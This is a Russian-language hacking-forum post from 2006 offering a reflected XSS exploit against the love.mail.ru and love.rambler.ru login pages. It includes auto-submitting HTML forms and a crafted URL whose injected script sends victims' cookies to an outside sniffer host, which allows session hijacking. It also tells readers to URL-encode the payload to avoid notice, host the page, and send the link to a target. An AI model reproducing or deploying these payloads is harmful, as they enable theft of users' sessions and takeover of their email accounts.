Тема: XSS mail.ru rambler.ru
Показать сообщение отдельно

XSS mail.ru rambler.ru
  #1  
Старый 04.12.2006, 20:40
slider
Members of Antichat - Level 5
Регистрация: 04.09.2005
Сообщений: 528
С нами: 10885346

Репутация: 2947


По умолчанию XSS mail.ru rambler.ru
Гы гы ... долго же вы ждали темы как ломать эти почтовики =)

Старый добрый дядя slider вам расскроет тайну Да.. да... прям возьмём и угоним сессию..

Короче ... дело было вечером .. делать было нечего..
и полез я искать уязвимости на этих почтовиках..

После многих часов поиска (уважайте чужой труд! ) нашол таки...
в файле http://love.mail.ru/my/login.phtml скрытую строку:
Код HTML:
<input type="hidden" name="tcurl">
Да да... именно она слабое звено!...
паразитка такая не фильтруетсо =)

вбил я в нее "><script>alert()</script> и вылез заветный алерт!..


А вот тут по сценарию вам надо дать exploit ))
С переадрессацией и со всеми наворотами ))

А вот он б*я =)

майл.ru

Код HTML:
<body onload="p.submit()">
<form action="http://love.mail.ru/my/login.phtml" method="post" id="p">
<input type="hidden" name="tcurl" value='"><script>img = new Image(); img.src = "http://antichat.ru/s/сниффер.gif?"+document.cookie;</script><script>navigate("http://love.mail.ru")</script>'>
рамблер.ru


Код HTML:
<body onload="p.submit()">
<form action="http://love.rambler.ru/my/login.phtml" method="post" id="p">
<input type="hidden" name="tcurl" value='"><script>img = new Image(); img.src = "http://antichat.ru/s/сниффер.gif?"+document.cookie;</script><script>navigate("http://love.rambler.ru")</script>'>

СПРОСИТЕ ВЫ А ПРИЧЁМ ТУТ ПОЧТОВИК mail.ru и rambler.ru ?

А вот причём... кука прийдёт и от лов и от майла! =)
Так что статейка думаю многим пригодистя =)

Ну что.. время пошло кто не успел тот опоздал... =)
Торопитесь время акции ограничего =)

С уважением slider


Ахх да... как юзать ))
Сохраняете этот "сплойт" в html и качаете на народ.ru
далее даёте ссылку комунить на свой "скрипт"... ))
Удачи!..

Вот вам ещё скриптеГ =)

Код HTML:
http://love.mail.ru/my/login.phtml?tcurl="><script>navigate('http://antichat.org/s/ВАШ СНИФФЕР.gif?'.concat(document.cookie))</script>
Чтоб было меньше палева .. кодируем это .. и получисо чтот типа того!..

Код HTML:
http://love.mail.ru/my/login.phtml?tcurl=%22%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%29%3C%2F%73%63%72%69%70%74%3E
𝕏 Twitter Reddit Telegram Копировать ссылку
Последний раз редактировалось slider; 05.12.2006 в 17:48..
 
Ответить с цитированием